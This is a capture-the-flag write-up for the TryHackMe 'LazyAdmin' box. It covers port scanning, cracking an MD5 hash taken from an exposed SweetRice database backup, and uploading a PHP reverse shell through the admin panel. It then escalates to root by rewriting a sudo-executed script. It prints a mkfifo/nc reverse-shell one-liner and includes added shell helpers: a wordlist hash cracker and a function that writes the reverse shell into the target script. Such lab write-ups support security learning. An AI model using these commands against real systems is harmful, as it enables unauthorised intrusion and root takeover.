TryHackMe: LazyAdmin


Throughout this writeup, I will reference the machine IP address as 10.10.10.10.

Enumeration

I started with a network scan using rustscan. rustscan -a 10.10.10.10 --ulimit 5000 -- -sC -sV scans the specified IP address with rustscan and then hands the open ports to nmap with the arguments given after the --: in this case default scripts (-sC) and version detection (-sV).

With this, there are two open ports on the machine: 22 (SSH) and 80 (HTTP). I started by browsing to the web page, but it was just the default Apache installation page. So I then ran feroxbuster to check for any other interesting directories on the server. The only directory found was /content/, with multiple subdirectories: /content/inc, /content/as, /content/attachments, etc. Browsing to http://10.10.10.10/content reveals that the site is running SweetRice.

The next thing I did was look in the /content/inc directory, as that often holds core components of the site, such as database logins if it is not set up properly. I found two interesting items: 1) latest.txt, which contained just "1.5.1", which I assume is the SweetRice version, and 2) mysql_backups, which held a MySQL backup. I then looked up SweetRice 1.5.1 vulnerabilities and found an Arbitrary File Upload exploit. This exploit requires a username and password, so let's find them.

In the backup file we can find the username and a hashed password. The hash is a 32-character hex string, i.e. an unsalted MD5, which is why the raw-md5 format (John) and mode 0 (Hashcat) below apply. All we have to do is run the hash through John the Ripper or Hashcat and we will crack it.

John: john --format=raw-md5 --wordlist=/usr/share/wordlists/rockyou.txt hash

Hashcat: hashcat -a 0 -m 0 hash /usr/share/wordlists/rockyou.txt

In both commands, hash is a file containing only the hash value taken from the backup.
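To make clear what John and Hashcat are doing with raw-md5 / mode 0, here is an added example (not part of the original writeup) of a minimal unsalted-MD5 wordlist attack in POSIX shell. It assumes md5sum from coreutils is available; the hash and wordlist it expects are constructed inputs, not the SweetRice credentials from the box.

```shell
#!/bin/sh
# Added example: a wordlist attack against an unsalted MD5 hash, which is what
# `john --format=raw-md5` and `hashcat -m 0` do at scale. Assumes md5sum
# (coreutils). The inputs are constructed for this example, not taken from
# the SweetRice backup.

# Return 0 if the argument looks like a raw MD5 digest (32 hex characters).
looks_like_md5() {
    printf '%s' "$1" | grep -Eq '^[0-9a-fA-F]{32}$'
}

# crack_md5 HASH WORDLIST
# Hash every line of WORDLIST and compare to HASH. Prints the matching word
# and returns 0 on success, 1 if the wordlist is exhausted, 2 on bad input.
crack_md5() {
    target=$(printf '%s' "$1" | tr 'A-F' 'a-f')   # md5sum prints lowercase
    wordlist="$2"
    looks_like_md5 "$target" || { echo "not a raw MD5 hash: $1" >&2; return 2; }
    # `|| [ -n "$word" ]` still processes a last line without a trailing newline.
    while IFS= read -r word || [ -n "$word" ]; do
        candidate=$(printf '%s' "$word" | md5sum | cut -d' ' -f1)
        if [ "$candidate" = "$target" ]; then
            printf '%s\n' "$word"
            return 0
        fi
    done < "$wordlist"
    return 1
}

# Usage with a constructed wordlist (hypothetical, for the example only):
#   printf 'letmein\nsummer2020\npassword\n' > words.txt
#   crack_md5 5f4dcc3b5aa765d61d8327deb882cf99 words.txt   # prints: password
```

The check in looks_like_md5 is the practical point: raw-md5 only applies when the stored value is a bare 32-hex-character digest. A salted or prefixed format (for example $1$... or a hex string of another length) needs a different John format or Hashcat mode, and feeding it to mode 0 will simply never crack.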

Exploitation

With the username and password, we can now run the exploit. I first grabbed a PHP reverse shell from pentestmonkey and started a listener with ncat -lvnp 8888. I ran python3 exploit.py and gave it the username, password and file to upload, and it reported that the upload succeeded. However, when browsing to http://10.10.10.10/content/attachments/rev.php I got a file not found, so the exploit didn't seem to be working.

I then went to http://10.10.10.10/content/as and logged in to the administrator account. After some digging I noticed that the Ads section lets you upload code, which is saved under /content/ads/. So I uploaded the PHP reverse shell, started the listener again, browsed to http://10.10.10.10/content/ads/rev.php and was given a reverse shell!

A whoami reveals we are www-data, and cd /home followed by ls shows an itguy home directory. ls itguy reveals user.txt, which can be read with cat user.txt.

Privilege Escalation

We start with sudo -l to see what www-data can run via sudo. The only entry is a Perl script, backup.pl. Reading backup.pl with cat shows that it runs a shell script, /etc/copy.sh. Catting that file shows it contains:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.1 5554 >/tmp/f

So we have a reverse shell that we can trigger as root via sudo. We just need to change the IP address to our own: the address of the attacking machine where the listener runs, not the target's. I first tried using nano, but it wouldn't work. vim and vi didn't work either (the reverse shell is not a full TTY, so interactive editors cannot run). The only solution I could think of was to overwrite the file with echo: echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.10 5554 >/tmp/f" > /etc/copy.sh. This only works because /etc/copy.sh is writable by www-data; check with ls -l /etc/copy.sh before relying on it.

Now we start another listener with ncat -lvnp 5554 and run sudo /usr/bin/perl /home/itguy/backup.pl, which gives us the root shell. We can then cd ~ (root's home, /root) and cat root.txt to get the flag.
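The overwrite step above is easy to get wrong in a non-TTY shell (a typo in the payload, or a file that turns out not to be writable, gives no feedback until the sudo run silently fails). The following is an added example, not a command from the original writeup: a small POSIX shell helper that builds the same mkfifo reverse shell for a given listener, refuses to proceed if the target script is not writable, and only then overwrites it. The target path, listener IP and port are arguments supplied by the caller; nothing here runs sudo or nc itself.

```shell
#!/bin/sh
# Added example (not the writeup's own command): prepare a writable script that
# a sudo rule indirectly executes (here /etc/copy.sh, called by backup.pl) so
# that it calls back to our listener. Assumes the caller supplies TARGET, IP
# and PORT and that TARGET is already writable by the current user.

# reverse_shell_payload IP PORT
# Print the mkfifo reverse shell from the box, parameterised on the listener.
reverse_shell_payload() {
    ip="$1"
    port="$2"
    printf 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc %s %s >/tmp/f\n' "$ip" "$port"
}

# write_reverse_shell TARGET IP PORT
# Overwrite TARGET with the payload. The writability check comes first: if
# the file (or its directory) is not writable, nothing is changed and the
# function returns 1, which is the failure mode worth catching before
# starting a listener and running the sudo command.
write_reverse_shell() {
    target="$1"
    ip="$2"
    port="$3"
    if [ ! -w "$target" ]; then
        echo "not writable: $target" >&2
        return 1
    fi
    reverse_shell_payload "$ip" "$port" > "$target"
}

# Usage on the box (IP is a hypothetical attacker address for the example):
#   write_reverse_shell /etc/copy.sh 10.9.8.7 5554 && cat /etc/copy.sh
# then, in another terminal on the attacking machine:
#   ncat -lvnp 5554
# and finally on the target:
#   sudo /usr/bin/perl /home/itguy/backup.pl
```

Because the payload is written with printf rather than typed inline, the quoting of the pipes and redirections is fixed once and does not depend on the shell you happen to be stuck in; the -w test is the same check as ls -l on /etc/copy.sh, done before anything is modified.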